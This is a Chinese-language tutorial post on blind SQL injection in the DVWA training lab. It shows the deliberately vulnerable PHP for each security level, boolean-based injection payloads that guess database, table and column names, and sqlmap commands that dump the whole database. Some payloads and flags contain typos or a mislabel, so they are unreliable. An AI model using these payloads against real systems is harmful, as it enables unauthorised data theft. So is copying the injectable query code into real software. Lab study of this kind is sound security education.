Security ❀ SQL Injection (Blind) SQL盲注
Posted 国家级干饭型选手°
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Security ❀ SQL Injection (Blind) SQL盲注相关的知识,希望对你有一定的参考价值。
1、low
源码解析:
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Get input
$id = $_GET[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
盲注只能回显用户ID是否存在,无其他回显内容,除此之外攻击基本相同,参考第8章 SQL注入;
盲注需要进行判断名称长度与猜测名称字符;较大的数据库人为盲注较为吃力,因此使用软件sqlmap进行盲注,详见第五节;
盲注执行命令
数据库长度是否大于1(支持大于,小于,等于,可以获取对应数值进行判断)
1' and length(database())>1 #
猜解数据库名称字符ASCII码是否大于1
1' and ascii(substr(database(),1,1))>1 #
表名长度是否大于1
1' and length(substr((select table_name from infomation_schema.tables where table_schema=database() limit 0,1),1))>1 #
猜解表名称字符ASCII码是否大于1
1' and ascii(substr((select table_name from infomation_schema.tables where table_schema=database() limit 0,1),1,1))>1 #
列名长度是否等于1
1' and (select count(column_name) from information_schema.columns where table_name= 'users')=1 #
猜解列名字符ASCII码是否等于7
1'and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1)=7 #
验证成功;
验证失败;
2、medium
源码解析:同SQL注入源码,mysqli_real_escape_string函数过滤关键字;
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
//mysql_close();
}
?>
3、high
源码解析:同SQL注入源码,LIMIT限制返回信息数量;\\
<?php
if( isset( $_COOKIE[ 'id' ] ) ) {
// Get input
$id = $_COOKIE[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
4、impossible
源码解析:使用token进行验证,查询内容只能为具体数字;
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
// Get results
if( $data->rowCount() == 1 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
5、使用sqlmap进行盲注
(sqlmap可以在kali内直接使用,或者参考《Windows系统下如何使用sqlmap》文档在Windows上使用)
《Windows系统下如何使用sqlmap》
使用Burpsuite获取http请求数据信息;
抓包如下;
将数据包内容复制在新文本文件内,并修改名称为1.txt(名称任意,为了方便输入需要简化);
将1.txt放在sqlmap执行脚本所在目录下
打开桌面sqlmap快捷方式,并按照下面命令进行输入:
获取数据库表
C:\\Users\\Administrator\\AppData\\Local\\Programs\\Python\\Python38\\sqlmap>sqlmap.py -r 1.txt -dbs
结果验证:
获取表数据
C:\\Users\\Administrator\\AppData\\Local\\Programs\\Python\\Python38\\sqlmap>sqlmap.py -r 1.txt -D dvwa -dump-all
结果验证:
以上是关于Security ❀ SQL Injection (Blind) SQL盲注的主要内容,如果未能解决你的问题,请参考以下文章
Portswigger-web-security-academy:sql injection
Portswigger-web-security-academy:sql injection
low security dvwa--SQL Injection(Blind)